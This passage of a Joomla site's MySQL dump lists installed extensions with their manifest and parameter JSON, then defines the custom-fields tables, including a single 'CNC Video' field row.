00:00:00',0,0),(10135,0,'AllVideos (by JoomlaWorks)','plugin','jw_allvideos','content',0,1,1,0,'{\"name\":\"AllVideos (by JoomlaWorks)\",\"type\":\"plugin\",\"creationDate\":\"August 22nd, 2019\",\"author\":\"JoomlaWorks\",\"copyright\":\"Copyright (c) 2006 - 2019 JoomlaWorks Ltd. All rights reserved.\",\"authorEmail\":\"please-use-the-contact-form@joomlaworks.net\",\"authorUrl\":\"www.joomlaworks.net\",\"version\":\"5.1.0\",\"description\":\"JW_PLG_AV_XML_DESC\",\"group\":\"\",\"filename\":\"jw_allvideos\"}','{\"playerTemplate\":\"Responsive\",\"vfolder\":\"images\",\"vwidth\":\"600\",\"vheight\":\"450\",\"allowVideoDownloading\":\"1\",\"afolder\":\"images\\/audio\",\"awidth\":\"600\",\"aheight\":\"60\",\"allowAudioDownloading\":\"0\",\"maxwidth\":\"\",\"controls\":\"1\",\"autoplay\":\"0\",\"loop\":\"0\",\"ytnocookie\":\"0\"}','','',0,'0000-00-00 00:00:00',0,0),(10136,0,'ARI Ext Menu','module','mod_ariextmenu','',0,1,0,0,'{\"name\":\"ARI Ext Menu\",\"type\":\"module\",\"creationDate\":\"July 2017\",\"author\":\"ARI Soft\",\"copyright\":\"ARI Soft\",\"authorEmail\":\"info@ari-soft.com\",\"authorUrl\":\"www.ari-soft.com\",\"version\":\"2.2.12\",\"description\":\"ARI_EXT_MENU_MODULE\",\"group\":\"\",\"filename\":\"_mod_ariextmenu\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10137,0,'PLG_EASYKEYWORDSITEMAP','plugin','easykeywordsitemap','content',0,0,1,0,'{\"name\":\"PLG_EASYKEYWORDSITEMAP\",\"type\":\"plugin\",\"creationDate\":\"2019-07-07\",\"author\":\"Viktor Vogel\",\"copyright\":\"Copyright 2019 Viktor Vogel. All rights reserved.\",\"authorEmail\":\"\",\"authorUrl\":\"\",\"version\":\"3.3.3\",\"description\":\"PLG_EASYKEYWORDSITEMAP_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"easykeywordsitemap\"}','{\"donation_code\":\"\"}','','',0,'0000-00-00 00:00:00',0,0),(10138,10146,'COM_JLSITEMAP','component','com_jlsitemap','',1,1,0,0,'{\"name\":\"COM_JLSITEMAP\",\"type\":\"component\",\"creationDate\":\"14.03.2020\",\"author\":\"Joomline\",\"copyright\":\"Copyright (c) 2010 - 2020 Joomline. All rights reserved.\",\"authorEmail\":\"sale@joomline.ru\",\"authorUrl\":\"https:\\/\\/joomline.ru\\/\",\"version\":\"1.10.2\",\"description\":\"COM_JLSITEMAP_DESCRIPTION\",\"group\":\"\",\"filename\":\"jlsitemap\"}','{\"access_key\":\"N1L8oyCuEgdREme\",\"sef_advanced\":\"1\",\"html_limit\":\"200\",\"changefreq\":\"weekly\",\"priority\":\"0.5\",\"filter_raw_index\":\"0\",\"filter_raw_component\":\"0\",\"filter_raw_get\":\"0\",\"filter_menu\":\"0\",\"filter_strpos\":\"\",\"filter_regexp\":[]}','','',0,'0000-00-00 00:00:00',0,0),(10139,10146,'PLG_JLSITEMAP_CONTACT','plugin','contact','jlsitemap',0,1,1,0,'{\"name\":\"PLG_JLSITEMAP_CONTACT\",\"type\":\"plugin\",\"creationDate\":\"14.03.2020\",\"author\":\"Joomline\",\"copyright\":\"Copyright (c) 2010 - 2020 Joomline. All rights reserved.\",\"authorEmail\":\"sale@joomline.ru\",\"authorUrl\":\"https:\\/\\/joomline.ru\",\"version\":\"1.10.2\",\"description\":\"PLG_JLSITEMAP_CONTACT_DESCRIPTION\",\"group\":\"\",\"filename\":\"contact\"}','{\"contacts_enable\":\"1\",\"contacts_changefreq\":\"weekly\",\"contacts_priority\":\"0.5\",\"categories_enable\":\"1\",\"categories_changefreq\":\"weekly\",\"categories_priority\":\"0.5\"}','','',0,'0000-00-00 00:00:00',0,0),(10140,10146,'PLG_JLSITEMAP_CONTENT','plugin','content','jlsitemap',0,1,1,0,'{\"name\":\"PLG_JLSITEMAP_CONTENT\",\"type\":\"plugin\",\"creationDate\":\"14.03.2020\",\"author\":\"Joomline\",\"copyright\":\"Copyright (c) 2010 - 2020 Joomline. All rights reserved.\",\"authorEmail\":\"sale@joomline.ru\",\"authorUrl\":\"https:\\/\\/joomline.ru\\/\",\"version\":\"1.10.2\",\"description\":\"PLG_JLSITEMAP_CONTENT_DESCRIPTION\",\"group\":\"\",\"filename\":\"content\"}','{\"articles_enable\":\"1\",\"articles_changefreq\":\"weekly\",\"articles_priority\":\"0.5\",\"categories_enable\":\"1\",\"categories_changefreq\":\"weekly\",\"categories_priority\":\"0.5\"}','','',0,'0000-00-00 00:00:00',0,0),(10141,10146,'PLG_JLSITEMAP_K2','plugin','k2','jlsitemap',0,0,1,0,'{\"name\":\"PLG_JLSITEMAP_K2\",\"type\":\"plugin\",\"creationDate\":\"14.03.2020\",\"author\":\"Joomline\",\"copyright\":\"Copyright (c) 2010 - 2020 Joomline. All rights reserved.\",\"authorEmail\":\"sale@joomline.ru\",\"authorUrl\":\"https:\\/\\/joomline.ru\\/\",\"version\":\"1.10.2\",\"description\":\"PLG_JLSITEMAP_K2_DESCRIPTION\",\"group\":\"\",\"filename\":\"k2\"}','{\"items_enable\":\"1\",\"items_changefreq\":\"weekly\",\"items_priority\":\"0.5\",\"categories_enable\":\"1\",\"categories_changefreq\":\"weekly\",\"categories_priority\":\"0.5\",\"tags_enable\":\"1\",\"tags_changefreq\":\"weekly\",\"tags_priority\":\"0.5\",\"users_enable\":\"1\",\"users_changefreq\":\"weekly\",\"users_priority\":\"0.5\"}','','',0,'0000-00-00 00:00:00',0,0),(10142,10146,'PLG_JLSITEMAP_KUNENA','plugin','kunena','jlsitemap',0,1,1,0,'{\"name\":\"PLG_JLSITEMAP_KUNENA\",\"type\":\"plugin\",\"creationDate\":\"14.03.2020\",\"author\":\"Joomline\",\"copyright\":\"Copyright (c) 2010 - 2020 Joomline. All rights reserved.\",\"authorEmail\":\"sale@joomline.ru\",\"authorUrl\":\"https:\\/\\/joomline.ru\\/\",\"version\":\"1.10.2\",\"description\":\"PLG_JLSITEMAP_KUNENA_DESCRIPTION\",\"group\":\"\",\"filename\":\"kunena\"}','{\"topics_enable\":\"1\",\"topics_changefreq\":\"weekly\",\"topics_priority\":\"0.5\",\"categories_enable\":\"1\",\"categories_changefreq\":\"weekly\",\"categories_priority\":\"0.5\",\"users_enable\":\"1\",\"users_changefreq\":\"weekly\",\"users_priority\":\"0.5\"}','','',0,'0000-00-00 00:00:00',0,0),(10143,10146,'PLG_JLSITEMAP_TAGS','plugin','tags','jlsitemap',0,1,1,0,'{\"name\":\"PLG_JLSITEMAP_TAGS\",\"type\":\"plugin\",\"creationDate\":\"14.03.2020\",\"author\":\"Joomline\",\"copyright\":\"Copyright (c) 2010 - 2020 Joomline. All rights reserved.\",\"authorEmail\":\"sale@joomline.ru\",\"authorUrl\":\"https:\\/\\/joomline.ru\",\"version\":\"1.10.2\",\"description\":\"PLG_JLSITEMAP_TAGS_DESCRIPTION\",\"group\":\"\",\"filename\":\"tags\"}','{\"changefreq\":\"weekly\",\"priority\":\"0.5\"}','','',0,'0000-00-00 00:00:00',0,0),(10144,10146,'PLG_JLSITEMAP_VIRTUEMART','plugin','virtuemart','jlsitemap',0,1,1,0,'{\"name\":\"PLG_JLSITEMAP_VIRTUEMART\",\"type\":\"plugin\",\"creationDate\":\"14.03.2020\",\"author\":\"Joomline\",\"copyright\":\"Copyright (c) 2010 - 2020 Joomline. All rights reserved.\",\"authorEmail\":\"sale@joomline.ru\",\"authorUrl\":\"https:\\/\\/joomline.ru\",\"version\":\"1.10.2\",\"description\":\"PLG_JLSITEMAP_VIRTUEMART_DESCRIPTION\",\"group\":\"\",\"filename\":\"virtuemart\"}','{\"products_enable\":\"1\",\"products_changefreq\":\"weekly\",\"products_priority\":\"0.5\",\"categories_enable\":\"1\",\"categories_changefreq\":\"weekly\",\"categories_priority\":\"0.5\",\"manufacturers_enable\":\"1\",\"manufacturers_changefreq\":\"weekly\",\"manufacturers_priority\":\"0.5\",\"vendors_enable\":\"0\",\"vendors_changefreq\":\"weekly\",\"vendors_priority\":\"0.5\"}','','',0,'0000-00-00 00:00:00',0,0),(10145,10146,'PLG_SYSTEM_JLSITEMAP_CRON','plugin','jlsitemap_cron','system',0,1,1,0,'{\"name\":\"PLG_SYSTEM_JLSITEMAP_CRON\",\"type\":\"plugin\",\"creationDate\":\"14.03.2020\",\"author\":\"Joomline\",\"copyright\":\"Copyright (c) 2010 - 2020 Joomline. All rights reserved.\",\"authorEmail\":\"sale@joomline.ru\",\"authorUrl\":\"https:\\/\\/joomline.ru\\/\",\"version\":\"1.10.2\",\"description\":\"PLG_SYSTEM_JLSITEMAP_CRON_DESCRIPTION\",\"group\":\"\",\"filename\":\"jlsitemap_cron\"}','{\"key_enabled\":\"0\",\"client_enable\":\"0\",\"client_mode\":\"all\",\"client_cache_number\":\"1\",\"client_cache_value\":\"day\"}','','',0,'0000-00-00 00:00:00',0,0),(10146,0,'PKG_JLSITEMAP','package','pkg_jlsitemap','',0,1,1,0,'{\"name\":\"PKG_JLSITEMAP\",\"type\":\"package\",\"creationDate\":\"14.03.2020\",\"author\":\"Joomline\",\"copyright\":\"Copyright (c) 2010 - 2020 Joomline. All rights reserved.\",\"authorEmail\":\"sale@joomline.ru\",\"authorUrl\":\"https:\\/\\/joomline.ru\\/\",\"version\":\"1.10.2\",\"description\":\"PKG_JLSITEMAP_DESCRIPTION\",\"group\":\"\",\"filename\":\"pkg_jlsitemap\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10148,0,'VM Custom - iStraxx Download simple','plugin','istraxx_download_simple','vmcustom',0,1,1,0,'{\"name\":\"VM - Custom, Virtuemart Simple Download Plugin\",\"type\":\"plugin\",\"creationDate\":\"September 06 2019\",\"author\":\"Max Milbers\",\"copyright\":\"Copyright (C) 2012-2019 iStraxx UG (haftungsbeschr\\u00e4nkt). All rights reserved\",\"authorEmail\":\"\",\"authorUrl\":\"https:\\/\\/extensions.virtuemart.net\",\"version\":\"${PHING.VERSION}\",\"description\":\"\\n<b>${PHING.DESCRIPTION}<\\/b>\\n<br\\/><a target=\\\"_blank\\\" href=\\\"http:\\/\\/www.extensions.virtuemart.net\\\">Visit extensions.virtuemart.net for more extensions<\\/a>\\n<p><img src=\\\"..\\/plugins\\/${PHING.GROUP}\\/${PHING.FILENAME}\\/assets\\/images\\/vm-istraxx.png\\\" align=\\\"bottom\\\"\\/><\\/p>\\n\\n<br style=\\\"clear: both;\\\">\\n<br\\/>\\nFirst installation:\\n<a target=\\\"_blank\\\" href=\\\"index.php?option=com_virtuemart&view=custom&task=edit\\\">\\n  Click here to configure the new customfield using the custom field type plugin<\\/a>\\n<br\\/>\\nSee also:\\n<br\\/>\\n<a target=\\\"_blank\\\" href=\\\"https:\\/\\/extensions.virtuemart.net\\/all-tutorials\\\">\\n  Installation Guide<\\/a>\\n\\n\",\"group\":\"\",\"filename\":\"istraxx_download_simple\"}','','','',0,'0000-00-00 00:00:00',0,0),(10149,10152,'Admintools','component','com_admintools','',1,1,0,0,'{\"name\":\"Admintools\",\"type\":\"component\",\"creationDate\":\"2024-09-23\",\"author\":\"Nicholas K. Dionysopoulos\",\"copyright\":\"Copyright (c)2010-2023 Nicholas K. Dionysopoulos\",\"authorEmail\":\"nicholas@akeeba.com\",\"authorUrl\":\"https:\\/\\/www.akeeba.com\",\"version\":\"6.2.1\",\"description\":\"Security and utilitarian tools for Joomla! site administrators\",\"group\":\"\",\"filename\":\"admintools\"}','{\"updatedb\":null,\"siteurl\":\"http:\\/\\/www.3s-technologies.com.tr\\/\"}','','',0,'0000-00-00 00:00:00',0,0),(10150,10152,'PLG_SYSTEM_ADMINTOOLS','plugin','admintools','system',0,1,1,0,'{\"name\":\"PLG_SYSTEM_ADMINTOOLS\",\"type\":\"plugin\",\"creationDate\":\"2024-09-23\",\"author\":\"Nicholas K. Dionysopoulos\",\"copyright\":\"Copyright (c)2010-2023 Nicholas K. Dionysopoulos\",\"authorEmail\":\"nicholas@akeeba.com\",\"authorUrl\":\"https:\\/\\/www.akeeba.com\",\"version\":\"6.2.1\",\"description\":\"PLG_SYSTEM_ADMINTOOLS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"admintools\"}','{}','','',0,'0000-00-00 00:00:00',-1,0),(10151,10152,'PLG_ACTIONLOG_ADMINTOOLS','plugin','admintools','actionlog',0,0,1,0,'{\"name\":\"PLG_ACTIONLOG_ADMINTOOLS\",\"type\":\"plugin\",\"creationDate\":\"2024-09-23\",\"author\":\"Nicholas K. Dionysopoulos\",\"copyright\":\"Copyright (c)2006-2023 Nicholas K. Dionysopoulos\",\"authorEmail\":\"nicholas@dionysopoulos.me\",\"authorUrl\":\"https:\\/\\/www.akeeba.com\",\"version\":\"6.2.1\",\"description\":\"PLG_ACTIONLOG_ADMINTOOLS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"admintools\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10152,0,'Admin Tools package','package','pkg_admintools','',0,1,1,0,'{\"name\":\"Admin Tools package\",\"type\":\"package\",\"creationDate\":\"2024-09-23\",\"author\":\"Nicholas K. Dionysopoulos\",\"copyright\":\"Copyright (c)2010-2023 Akeeba Ltd \\/ Nicholas K. Dionysopoulos\",\"authorEmail\":\"\",\"authorUrl\":\"\",\"version\":\"6.2.1\",\"description\":\"Admin Tools Core installation package v.6.2.1\",\"group\":\"\",\"filename\":\"pkg_admintools\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10153,10154,'plg_fields_mediajce','plugin','mediajce','fields',0,1,1,0,'{\"name\":\"plg_fields_mediajce\",\"type\":\"plugin\",\"creationDate\":\"27-04-2021\",\"author\":\"Ryan Demmer\",\"copyright\":\"Copyright (C) 2006 - 2021 Ryan Demmer. All rights reserved\",\"authorEmail\":\"info@joomlacontenteditor.net\",\"authorUrl\":\"https:\\/\\/www.joomlacontenteditor.net\",\"version\":\"2.9.6\",\"description\":\"PLG_FIELDS_MEDIAJCE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mediajce\"}','[]','','',0,'0000-00-00 00:00:00',0,0),(10154,0,'PKG_JCE','package','pkg_jce','',0,1,1,0,'{\"name\":\"PKG_JCE\",\"type\":\"package\",\"creationDate\":\"27-04-2021\",\"author\":\"Ryan Demmer\",\"copyright\":\"\",\"authorEmail\":\"\",\"authorUrl\":\"\",\"version\":\"2.9.6\",\"description\":\"PKG_JCE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"pkg_jce\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10155,0,'jf_muoti','template','jf_muoti','',0,1,1,0,'{\"name\":\"jf_muoti\",\"type\":\"template\",\"creationDate\":\"16\\/08\\/2017\",\"author\":\"Kreatif GmbH\",\"copyright\":\"Kreatif GmbH\",\"authorEmail\":\"info@joomfreak.com\",\"authorUrl\":\"http:\\/\\/www.joomfreak.com\",\"version\":\"1.0.0\",\"description\":\"<style type=\\\"text\\/css\\\" media=\\\"all\\\">\\n<!--#container {padding:0 10px;}h2 {font-family: Arial Narrow,sans-serif;font-size:24px;margin:0; co-lor:#000;}--><\\/style>\\n<div id=\\\"container\\\"><h2>jf_muoti<\\/h2><hr color=\\\"#E6E6E6\\\" size=\\\"0\\\">\\n<p><i>joomfreak September 2017! Joomla 3 Template | Creative Commons | by joomfreak.com!<\\/i><\\/p><hr color=\\\"#E6E6E6\\\" size=\\\"0\\\">\\n<p>License: <strong><a href=\\\"http:\\/\\/creativecommons.org\\/licenses\\/by\\/2.5\\/\\\" target=\\\"_blank\\\">Creative Commons, Attribution 2.5 Generic (CC BY 2.5)<\\/a><\\/strong><\\/p><hr color=\\\"#E6E6E6\\\" size=\\\"0\\\">\\n<p>JF Muoti demo available here &raquo; <strong><a href=\\\"http:\\/\\/www.joomfreak.com\\/demo\\/\\\" target=\\\"_blank\\\">joomfreak Demo Server<\\/a><\\/strong><\\/p><hr color=\\\"#E6E6E6\\\" size=\\\"0\\\">\\n<p><a title=\\\"Visit our official website!\\\" href=\\\"http:\\/\\/www.joomfreak.com\\\" target=\\\"_blank\\\">\\n<img style=\\\"padding-left: 5px;\\\" src=\\\"..\\/templates\\/jf_muoti\\/images\\/core\\/jf_muoti.gif\\\" border=\\\"0\\\" alt=\\\"Logo\\\" \\/><\\/a><\\/p>\\n<img src=\\\"..\\/templates\\/jf_muoti\\/images\\/core\\/module_positions.jpg\\\" border=\\\"0\\\" alt=\\\"Module Positions\\\" \\/>\\n<\\/div>\\n\\t\",\"group\":\"\",\"filename\":\"templateDetails\"}','{\"logoOption\":\"\",\"logoFile\":\"\",\"logoText\":\"MUOTI\",\"backgroundColor\":\"\",\"googleFont\":\"\",\"templateColor\":\"#00aeef\",\"homepageLayout\":\"\",\"social\":\"1\",\"twitterIcon\":\"1\",\"twitterLink\":\"\",\"facebookIcon\":\"1\",\"facebookLink\":\"\",\"googleIcon\":\"1\",\"googleLink\":\"\",\"linkedInIcon\":\"1\",\"linkedInLink\":\"\",\"vimeoIcon\":\"1\",\"vimeoLink\":\"\",\"pinterestIcon\":\"1\",\"pinterestLink\":\"\",\"copyright\":\"\\u00a9 Copyright 2017.\",\"map\":\"1\",\"latitude\":\"40.790278\",\"longitude\":\"-73.959722\"}','','',0,'0000-00-00 00:00:00',0,0),(10156,0,'jf_couda','template','jf_couda','',0,1,1,0,'{\"name\":\"jf_couda\",\"type\":\"template\",\"creationDate\":\"15\\/03\\/2016\",\"author\":\"Kreatif GmbH\",\"copyright\":\"Kreatif GmbH\",\"authorEmail\":\"info@joomfreak.com\",\"authorUrl\":\"http:\\/\\/www.joomfreak.com\",\"version\":\"1.0.0\",\"description\":\"<style type=\\\"text\\/css\\\" media=\\\"all\\\">\\n<!--#container {padding:0 10px;}h2 {font-family: Arial Narrow,sans-serif;font-size:24px;margin:0; co-lor:#000;}--><\\/style>\\n<div id=\\\"container\\\"><h2>jf_couda<\\/h2><hr color=\\\"#E6E6E6\\\" size=\\\"0\\\">\\n<p><i>joomfreak April 2016! Joomla 3 Template | Creative Commons | by joomfreak.com!<\\/i><\\/p><hr color=\\\"#E6E6E6\\\" size=\\\"0\\\">\\n<p>License: <strong><a href=\\\"http:\\/\\/creativecommons.org\\/licenses\\/by\\/2.5\\/\\\" target=\\\"_blank\\\">Creative Commons, Attribution 2.5 Generic (CC BY 2.5)<\\/a><\\/strong><\\/p><hr color=\\\"#E6E6E6\\\" size=\\\"0\\\">\\n<p>JF Couda demo available here &raquo; <strong><a href=\\\"http:\\/\\/www.joomfreak.com\\/demo\\/\\\" target=\\\"_blank\\\">joomfreak Demo Server<\\/a><\\/strong><\\/p><hr color=\\\"#E6E6E6\\\" size=\\\"0\\\">\\n<p><a title=\\\"Visit our official website!\\\" href=\\\"http:\\/\\/www.joomfreak.com\\\" target=\\\"_blank\\\">\\n<img style=\\\"padding-left: 5px;\\\" src=\\\"..\\/templates\\/jf_couda\\/images\\/core\\/jf_couda.gif\\\" border=\\\"0\\\" alt=\\\"Logo\\\" \\/><\\/a><\\/p>\\n<img src=\\\"..\\/templates\\/jf_couda\\/images\\/core\\/module_positions.jpg\\\" border=\\\"0\\\" alt=\\\"Module Positions\\\" \\/>\\n<\\/div>\\n\\t\",\"group\":\"\",\"filename\":\"templateDetails\"}','{\"logoOption\":\"\",\"logoFile\":\"\",\"logoText\":\"COUDA\",\"backgroundColor\":\"\",\"googleFont\":\"\",\"templateColor\":\"#00aeef\",\"social\":\"1\",\"twitterIcon\":\"1\",\"twitterLink\":\"\",\"facebookIcon\":\"1\",\"facebookLink\":\"\",\"pinterestIcon\":\"1\",\"pinterestLink\":\"\",\"instagramIcon\":\"1\",\"instagramLink\":\"\",\"dribbbleIcon\":\"1\",\"dribbbleLink\":\"\",\"copyright\":\"Copyright 2016\",\"map\":\"1\",\"latitude\":\"40.790278\",\"longitude\":\"-73.959722\"}','','',0,'0000-00-00 00:00:00',0,0),(10157,0,'file_fof40','file','file_fof40','',0,1,0,0,'{\"name\":\"file_fof40\",\"type\":\"file\",\"creationDate\":\"2022-10-24\",\"author\":\"Nicholas K. Dionysopoulos \\/ Akeeba Ltd\",\"copyright\":\"Copyright (c)2010-2019 Nicholas K. Dionysopoulos \\/ Akeeba Ltd\",\"authorEmail\":\"nicholas@akeeba.com\",\"authorUrl\":\"https:\\/\\/www.akeeba.com\",\"version\":\"4.1.4\",\"description\":\"\\n\\t\\t\\n\\t\\tFramework-on-Framework (FOF) 4.x - The rapid application development framework for Joomla!.<br\\/>\\n\\t\\t<b>WARNING<\\/b>: This is NOT a duplicate of the FOF library already installed with Joomla! 3. It is a different version used by other extensions on your site. Do NOT uninstall either FOF package. If you do you will break your site.\\n\\t\\t\\n\\t\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(10159,0,'plg_quickicon_eos310','plugin','eos310','quickicon',0,1,1,0,'{\"name\":\"plg_quickicon_eos310\",\"type\":\"plugin\",\"creationDate\":\"June 2021\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2021 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.10.0\",\"description\":\"PLG_QUICKICON_EOS310_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"eos310\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10160,10152,'PLG_SYSTEM_AKVERSIONCHECK','plugin','akversioncheck','system',0,1,1,0,'{\"name\":\"PLG_SYSTEM_AKVERSIONCHECK\",\"type\":\"plugin\",\"creationDate\":\"2024-09-23\",\"author\":\"Nicholas K. Dionysopoulos\",\"copyright\":\"Copyright (c)2006-2023 Nicholas K. Dionysopoulos\",\"authorEmail\":\"nicholas@dionysopoulos.me\",\"authorUrl\":\"https:\\/\\/www.akeeba.com\",\"version\":\"8.4.0\",\"description\":\"PLG_SYSTEM_AKVERSIONCHECK_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"akversioncheck\"}','{}','','',0,'0000-00-00 00:00:00',0,0);
/*!40000 ALTER TABLE `fz6t4_extensions` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_fields`
--

DROP TABLE IF EXISTS `fz6t4_fields`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_fields` (
  `id` int unsigned NOT NULL AUTO_INCREMENT,
  `asset_id` int unsigned NOT NULL DEFAULT '0',
  `context` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `group_id` int unsigned NOT NULL DEFAULT '0',
  `title` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `name` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `label` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `default_value` text CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci,
  `type` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'text',
  `note` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `description` text CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  `state` tinyint(1) NOT NULL DEFAULT '0',
  `required` tinyint(1) NOT NULL DEFAULT '0',
  `checked_out` int NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `ordering` int NOT NULL DEFAULT '0',
  `params` text CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  `fieldparams` text CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  `language` char(7) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `created_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_user_id` int unsigned NOT NULL DEFAULT '0',
  `modified_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int unsigned NOT NULL DEFAULT '0',
  `access` int NOT NULL DEFAULT '1',
  PRIMARY KEY (`id`),
  KEY `idx_checkout` (`checked_out`),
  KEY `idx_state` (`state`),
  KEY `idx_created_user_id` (`created_user_id`),
  KEY `idx_access` (`access`),
  KEY `idx_language` (`language`),
  KEY `idx_context` (`context`(191))
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_fields`
--

LOCK TABLES `fz6t4_fields` WRITE;
/*!40000 ALTER TABLE `fz6t4_fields` DISABLE KEYS */;
INSERT INTO `fz6t4_fields` VALUES (1,227,'com_content.categories',0,'CNC Video','cnc-video','CNC Video','','repeatable','','',1,0,0,'0000-00-00 00:00:00',0,'{\"hint\":\"\",\"class\":\"\",\"label_class\":\"\",\"show_on\":\"\",\"render_class\":\"\",\"showlabel\":\"1\",\"label_render_class\":\"\",\"display\":\"2\",\"layout\":\"\",\"display_readonly\":\"2\"}','','*','2019-09-16 16:28:44',676,'0000-00-00 00:00:00',0,1);
/*!40000 ALTER TABLE `fz6t4_fields` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_fields_categories`
--

DROP TABLE IF EXISTS `fz6t4_fields_categories`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_fields_categories` (
  `field_id` int NOT NULL DEFAULT '0',
  `category_id` int NOT NULL DEFAULT '0',
  PRIMARY KEY (`field_id`,`category_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_fields_categories`
--

LOCK TABLES `fz6t4_fields_categories` WRITE;
/*!40000 ALTER TABLE `fz6t4_fields_categories` DISABLE KEYS */;
/*!40000 ALTER TABLE `fz6t4_fields_categories` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_fields_groups`
--

DROP TABLE IF EXISTS `fz6t4_fields_groups`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_fields_groups` (
  `id` int unsigned NOT NULL AUTO_INCREMENT,
  `asset_id` int unsigned NOT NULL DEFAULT '0',
  `context` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `title` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `note` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `description` text CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  `state` tinyint(1) NOT NULL DEFAULT '0',
  `checked_out` int NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `ordering` int NOT NULL DEFAULT '0',
  `params` text CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  `language` char(7) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int unsigned NOT NULL DEFAULT '0',
  `modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int unsigned NOT NULL DEFAULT '0',
  `access` int NOT NULL DEFAULT '1',
  PRIMARY KEY (`id`),
  KEY `idx_checkout` (`checked_out`),
  KEY `idx_state` (`state`),
  KEY `idx_created_by` (`created_by`),
  KEY `idx_access` (`access`),
  KEY `idx_language` (`language`),
  KEY `idx_context` (`context`(191))
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_fields_groups`
--

LOCK TABLES `fz6t4_fields_groups` WRITE;
/*!40000 ALTER TABLE `fz6t4_fields_groups` DISABLE KEYS */;
/*!40000 ALTER TABLE `fz6t4_fields_groups` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_fields_values`
--

DROP TABLE IF EXISTS `fz6t4_fields_values`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_fields_values` (
  `field_id` int unsigned NOT NULL,
  `item_id` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL COMMENT 'Allow references to items which have strings as ids, eg. none db systems.',
  `value` text CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci,
  KEY `idx_field_id` (`field_id`),
  KEY `idx_item_id` (`item_id`(191))
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_fields_values`
--

LOCK TABLES `fz6t4_fields_values` WRITE;
/*!40000 ALTER TABLE `fz6t4_fields_values` DISABLE KEYS */;
/*!40000 ALTER TABLE `fz6t4_fields_values` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_finder_filters`
--

DROP TABLE IF EXISTS `fz6t4_finder_filters`;
